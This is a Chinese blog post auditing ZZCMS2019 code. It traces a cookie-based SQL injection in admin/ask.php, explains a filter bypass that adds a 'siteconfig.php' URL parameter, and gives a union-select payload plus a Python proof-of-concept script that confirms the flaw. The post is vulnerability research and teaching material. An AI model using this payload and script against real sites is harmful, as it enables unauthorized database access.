PHP代码审计ZZCMS2019之cookie注入

已于 2022-11-24 10:36:22 修改
阅读量729 收藏
点赞数 2
文章标签: php 开发语言
于 2022-11-23 23:21:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51631141/article/details/128009053
版权

ZZCMS2019代码审计之cookie注入

1. cookie注入的主要文件 admin/ask.php

在这里插入图片描述
进入ask.php文件,如图所标志cookie这个参数直接写到了sql语句中,可以初步判定可能存在sql注入漏洞,要想执行此处的sql语句自然是要调用相应的方法的,该sql的对应方法是add,通过调用add方法才能执行到上图中的代码,这里不多讲,直接找到调用add函数的位置。

2. 寻找执行注入语句的方法

在这里插入图片描述
成功找到调用add方法的代码,此处的逻辑只需要在get请求中加入do参数并赋值为add则会自动调用add方法

3. 使用burp联动phpstorm调试代码

一、通过do=add进入add方法

在这里插入图片描述

二、在cookie中写入恶意语句

在这里插入图片描述
传入恶意的SQL语句:

#联合注入
-1+union+select+user(),2,3,4,5,6,7,8,9,10,11

ZZCMS数据库默认是11个字段这里直接写payload
跟进内部存在cookie的过滤,过滤的逻辑中存在绕过。

if (strpos($r_url,"siteconfig.php")==0 && strpos($r_url,"label")==0 && strpos($r_url,"template.php")==0)

绕过如上代码可直接不执行过滤,绕过方式在burp的url中任意添加一个变量参数定义为siteconfig.php直接绕过逻辑判断。
在这里插入图片描述

4. 最终的SQL语句

在这里插入图片描述
漏洞验证:
在这里插入图片描述

5.根据大佬思路写的POC验证脚本

该脚本仅供学习参考

import re
import requests
from bs4 import BeautifulSoup

geturl = "http://www.zzcms.com"
head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
}
cookie = {
    "askbigclassid": "-1+union+select+user(),2,3,4,5,6,7,8,9,10,11"
}
url = geturl+"/admin/ask.php?do=add&a=siteconfig.php"
try:
    Geturl = requests.get(url=url, cookies=cookie, headers=head) #设置url参数
    soup = BeautifulSoup(Geturl.text, "lxml")
    t = soup.find_all("option")[2]
    test = str(t)
    a = re.search(r"<option value=(.*)>3</option>", test).group(1)
    if a == '\"root@localhost\"':
        print("存在注入:", a.replace("\"", ""))
except:
    print("不存在")
让我在看看
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
(代码审计)zzcms前台SQL注入
Cobra的博客
04-20 585
代码审计
Cookie注入【要求php5.4以下版本】
最新发布
weixin_52351575的博客
09-13 219
Cookie注入入门【本篇笔记下用到的浏览器为EDGE浏览器,网上很少有用edge浏览器做的】
%3c php if() %3e,代码审计ZZCMS2019版 XSS
weixin_32027491的博客
04-13 355
ZZCMS2019版本代码审计记录下载重装漏洞step1.php中会检测是否存在install.lock,存在则显示已经安装过,否则跳出判断,执行正常安装但是该判断只在step1.php中存在,step2.php,step3.php,step4.php均不存在该代码step2.phpstep3.php设置了token,计算方式是:使用rand()生成一个随机数,然后以这个随机数作为前缀生成23位...
php 51ask,ask.php
weixin_39553352的博客
03-10 103
/*** @CopyRight (C)2006-2011 OE Development team Inc.* This is NOT a freeware, use is subject to license terms* @WebSite www.phpcoo.com,www.oecms.cn* @Author XiangFeng * @Brief OElove v2....
zzcms2019.zip
08-22
zzcms2019.zip】是一个压缩包文件,包含了用于代码审计、网站搭建以及PHP代码学习的相关资源。从标题和描述中我们可以提取出几个关键的知识点,它们是PHP编程语言的学习、网站构建以及代码安全审计。 首先,PHP...
zzcms83代码审计练习
10-24
提供刚刚学习代码审计的同学一起学习,其实也没有什么好说的,由于市面上比较难找,这里提供给大家方便下载,版本是8.3的。
ZZCMS201910代码审计1
08-03
ZZCMS201910 代码审计是一个深入理解软件安全性和进行漏洞挖掘的过程,主要关注的是SQL注入漏洞。SQL注入是一种常见的网络安全问题,它发生在应用程序未能充分验证或过滤用户输入,导致恶意用户可以通过构造特定的...
zzcms2020代码审计1
08-03
zzcms2020代码审计1】涉及的是一个针对zzcms内容管理系统在2020年进行的安全审计过程,该审计主要揭示了一个SQL注入漏洞。审计报告来源于奇安信攻防社区,其中包含了对问题的详细分析和复现步骤。 审计首先指出,...
zzcms,招商网cms,专业做招商网,zzcms专业做招商网zzcms201910.zip
01-15
ZZCMS 用项目加盟型模板,可快速搭建像 jiameng.com项目加盟网,u88.com,3158.cn,28.com,78.cn 等这种类型的商机网,致富网的程序、源码。
zzcms轻量级企业网站管理系统 v1.0 beta
11-07
本程序是一款轻量级企业网站管理系统,基于PHP+Mysql架构,可运行在Linux、Windows等各种平台上,系统搭载Smarty模板引擎,支持伪静态。后端使用Smarty框架,MVC模式。前端使用响应式HTML5+DIV+CSS框架,兼容IE6等各种版本浏览器,可拓展可视化布局功能:1:文章模块、单页面模块、产品模块、订单模块、招聘模块、下载模块、图库模块、友情链接模块、在线留言评论模块、广告模块、站内通告模块、邮件群发模块、会员模块、网站基本设置模块、个人会员中心模块2:无限分类功能3:购物车功能,永久保存订单4:内容分页功能5:分享功能6:用户组权限7:密码MD5加密功能8:自动命名分类、多文件上传功能9:页面浏览权限功能10:首页推荐、频道页推荐功能11:图片轮播功能12:文章、产品、下载、招聘、图库搜索功能13:SEO搜索优化,自定义keywords、description关键字,利于搜索引擎收录14:支持伪静态功能15:支付宝接口,实现在线购物16:采集功能17:数据库备份、导入功能18:自动清除缓存功能19:404页面20:在线物流单号查询21:系统日志功能数据库文件可
zzcms_v8.1.rar
03-12
这个是之前一篇文章的源代码,名字是逻辑漏洞-1,然后,代码是zzcms8.1,具体使用说明等,在文件夹里有说明,这里就不做详细说明了。
zzcms网站管理系统 v1.0.rar
07-06
程序说明 ZZCMS是一个免费的开源的网站管理系统,目前功能主要用于个人网站建设和企业网站建设,欢迎你的加入,请提出你宝贵的意见,在此感谢! 可用于建设企业网站及个人网站建设 采用PHP MYSQL开发 开发环境:php5.0 mysql5.0 特点: 简单易用,灵活的函数调用 MVC模式开发 多级栏目分类 采用著名的FCK编辑器为后台编辑器 目前具有模块:单页、文章、图片、下载、友情连接 程序安装路径:http://你的网站地址/install 后台路径:http://你的网站地址/admin/AdminLogin.php
zzcms网站管理系统 v1.0 sp3.rar
07-06
ZZCMS是一款小巧,高效,人性化的企业建站程序. 目前具有模块:单页、文章、产品、下载、友情连接、留言本、伪原创、记录蜘蛛等功能 采用缓存技术让速度更快 栏目为多级分类 留言可在后台设置是否通过审核的留言 系统自带4000多条同义词,并且可以自由添加修改同义词,还可以在后台设置是否启用伪原创。打造伪原创效果 方面调用功能让不懂程序的人也可以方便建站 介绍: 程序安装路径:http://你的网站地址/install 后台路径:http://你的网站地址/admin/AdminLogin.php 安装完成后请先在后台生成缓存
【CTF bugku cookies】关于cookie篡改、PHP代码审计
zw05011的博客
01-14 907
知识点 cookie cookie 常用于识别用户。cookie 是一种服务器留在用户计算机上的小文件。每当同一台计算机通过浏览器请求页面时,这台计算机将会发送 cookie。通过 PHP,您能够创建并取回 cookie 的值。 在PHP中,利用setcookie()函数可以创建和修改Cookie,以及设置Cookie的有效期;而使用$_COOKIE[]数组可以读取Cookie变量的值。 setcookie(name,value[,exprie,path,domain,secure]);//创建Co
phpstorm开启xdebug的基本步骤
yangker12148的博客
04-30 465
0x00前言 最近在学习php审计的时候需要用到xdebug,但是调试半天总是没弄好,最后请最强的黑客mux1ng帮我调试好了,这里记录一下开启xdebug步骤以及遇到的一些问题。 0x01步骤 1、选择对应的php版本,我这里选择的是php5.5.38,找到对应的php.ini文件,将下面的内容插入到xdebug那块去,并将原来xdebug的内容注释了如下图 zend_extension="D:\D\phpstudy\php\php-5.5.38\ext\php_xdebug.dll" ;是否允许Xdeb
zzcms8.3.zip
08-26
学习代码审计的源码,也可以用来学习PHP架构,等等.....
招商网站源码
07-03
招商网站源码

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

让我在看看

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值